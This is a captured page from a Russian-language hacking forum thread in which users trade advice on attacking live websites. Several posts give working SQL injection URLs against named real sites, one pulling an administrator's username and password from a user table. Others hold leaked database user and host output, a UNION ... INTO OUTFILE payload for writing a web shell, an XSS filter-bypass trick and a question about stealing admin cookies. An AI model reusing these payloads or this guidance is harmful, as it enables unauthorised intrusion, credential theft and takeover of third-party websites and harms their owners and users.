Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Kuteke

    Kuteke Banned

    Joined:
    26 Jun 2010
    Messages:
    189
    Likes Received:
    26
    Reputations:
    6
    FlaktW,
    blind...
    Как крутить при таком случае:
    Code:
    http://www.textsongs.ru/search/?name=%27
    
    p.s. просьба не цитировать мое сообщение...
     
    #17781 Kuteke, 30 Aug 2011
    Last edited: 30 Aug 2011
  2. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    496
    Likes Received:
    33
    Reputations:
    12
    Как крутить при таком случае:
    Code:
    http://www.textsongs.ru/search/?name=%27
    
    Вот так!
    5.0.77-log: peoplesru:alex192@192.168.0.162:redhat-linux-gnu
     
    2 people like this.
  3. ~{OmRus}~

    ~{OmRus}~ New Member

    Joined:
    27 Aug 2011
    Messages:
    24
    Likes Received:
    2
    Reputations:
    1
    Вопрос: Чтобы угнать ак админа нужно спирить у его куки, чтобы забрать куки нужно снифер, чтобы снифер заберал куки нужно xss уязвимость, чтобы найти уязвимость нужно посетить сайт античат. Я все правельно понял? или здесь чтото нетак? И как поподробней использувать xss со снифером если можно ссилки на мануалы
     
  4. wkar

    wkar Elder - Старейшина

    Joined:
    18 Oct 2009
    Messages:
    211
    Likes Received:
    63
    Reputations:
    34
    2~{OmRus}~
    http://forum.antichat.ru/thread20140.html
     
    1 person likes this.
  5. ReV0LVeR

    ReV0LVeR Banned

    Joined:
    3 May 2011
    Messages:
    30
    Likes Received:
    5
    Reputations:
    1
    http://finclub.perm.ru/?show=561064292&news_id=-815805698+union+select+1,2,user(),4,version(),6,7,8 не могу подобрать таблицы. 4 ветка.
     
  6. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    155
    Likes Received:
    18
    Reputations:
    9
    это mod_rewrite? как получить путь до .php файла, выдающего phpinfo()?
     
  7. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,587
    Likes Received:
    405
    Reputations:
    196
    SCRIPT_FILENAME /pub/home/***/new/htdocs/test.php
     
    #17787 попугай, 1 Sep 2011
    Last edited by a moderator: 2 Sep 2011
  8. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    12
    Reputations:
    5
    на сайте имеется XSS
    проходят подставки типа <b>hack</b> и пр.
    а
    <script>alert('hack')</script> не канает, как дальше двигать подскажите
     
  9. o'clock

    o'clock Elder - Старейшина

    Joined:
    16 May 2009
    Messages:
    126
    Likes Received:
    22
    Reputations:
    11
    Смотри что как фильтруется, поиграй символами, я пару раз видел фильтры, которые вырезают <script>, спасало что-то типа <scr<script>ipt>
    http://forum.antichat.ru/thread20140.html советую к ознакомлению
     
  10. gh0stface

    gh0stface New Member

    Joined:
    26 Aug 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    podskajite plz vozmojno li sdelat CREATE TABLE cherez: =-1+union+select+1,2,3,(create table test ( tst INT)),5,6+--+
    ili kak voobshe delat create table cherez injekciu, zaranee spasibo
     
  11. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    330
    Likes Received:
    129
    Reputations:
    54
    Через инъекцию в MySQL - нельзя! Можно только в MSSQL инъекции.
     
  12. gh0stface

    gh0stface New Member

    Joined:
    26 Aug 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    pomogite plz eshe s takoi situaciei:

    esli url yazvima i ya znau polnii put dla zaliva shell i znay chto v into outfile mojno ispolzovat kavichki, mojno li oboitis bes poiska colonok dla union a srazu popitatsa zalit shell v pervoi kolonke uniona, a ostalnie zakomentirovat:

    site.com?id=-1+union+select+0x6F6C6F6C6F+INTO+OUTFILE+'/path/tst.txt'+--+
     
  13. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    792
    Likes Received:
    349
    Reputations:
    120
    количество полей, используемых в запросе требуется найти для составления самого запроса, собственно. чтобы для сервера он был верным. в случае с INTO OUTFILE не нужно искать только принтабельные поля, т.к. мы вводим данные, а не выводим и можем сделать это через любое поле.
     
  14. sourcec0de

    sourcec0de Banned

    Joined:
    13 Jun 2011
    Messages:
    27
    Likes Received:
    12
    Reputations:
    7
    Логин и пасс админа.
    Code:
    http://www.magazin.seti.ee/modules/Board/index.php?pa=view&cid=78+limit+0+union+select+1,2,uname,pass,5,6,7,8,9,10,11+from+m_seti_users+limit+0,1%23
    
     
    1 person likes this.
  15. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,037
    Likes Received:
    531
    Reputations:
    935
    Я пожалуй процитирую первый пост:
    Здесь не центр первой помощи, и если кто-то хочет найти статью, мануал, фак, видео, заметку ЮЗАЙТЕ ПОИСК!
    Здесь не школьный кабинет, в котором вам будут разжевывать детально как что-то использовать, ВАМ МОГУТ ПОМОЧЬ, но за вас НИКТО НИЧЕГО ДЕЛАТЬ НЕ БУДЕТ И НЕ ДОЛЖЕН.

    Обращусь к людям кто отвечает на вопросы, я лично Вам очень благодарен, прекрасно понимаю, что значит грамотно и правильно объяснить задающему вопрос, ответ так, что бы он понял, но пожалуйста, повторюсь, пожалуйста, не решайте их проблемы за них, натолкните их на мысль, на правильное направление, но не давайте НИКОМУ готовых решений, потому, что люди этим пользуются, и не понимают, что они делают, и потом каждый раз приходят в эту тему и умоляют что бы за них кто-то подумал и сделал.

    Обращусь к людям кто задает вопрос, будьте так любезны. перед тем как задать вопрос, используйте поиск по форуму, пробегитесь глазами по заголовкам прикрепленных тем, в большинстве случаев ответ на ваш вопрос уже дан, даже поговорка есть "семь раз отмерь, один отрежь", и действительно лучше самому семь раз подумать, и решить проблему, тем самым повысив свой боевой скил, чем каждый раз спрашивать одно и тоже.
     
    _________________________
    1 person likes this.
  16. LamerHacker

    LamerHacker New Member

    Joined:
    22 Sep 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Помогите понять, в чем причина ошибки?

    Так инъекция срабатывает
    http://site.ru/index.php?a=50+and+1=if(ascii(substring((user()),1,1))>=100,1,0)/*

    но если подставить select перед user()

    http://site.ru/index.php?a=50+and+1=if(ascii(substring((SELECT user()),1,1))>=100,1,0)/*

    то выдает ошибку
    Может из-за версии mysql 3.23.44 ?
     
  17. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    958
    Likes Received:
    527
    Reputations:
    204
    Потому что (SELECT user()) будет является подзапросом, которые появились с версии 4.1. Так что да, ты прав, дело в версии.
     
  18. LamerHacker

    LamerHacker New Member

    Joined:
    22 Sep 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Спасибо

    Из-за версии не получается так же подставить UNION SELECT

    Я конечно сомневаюсь, но может есть способ вытащить данные из нужных таблиц без использования UNION SELECT?
     
  19. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    посимвольный брут
     
    _________________________
  20. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    390
    Likes Received:
    48
    Reputations:
    11
    есть скуля
    Code:
    http://www.vgtrk.com/rnews.html?sid=86&id=4716
    стоит oracle
    подскажите как вывести таблицы и колонки?
     
Loading...
Thread Status:
Not open for further replies.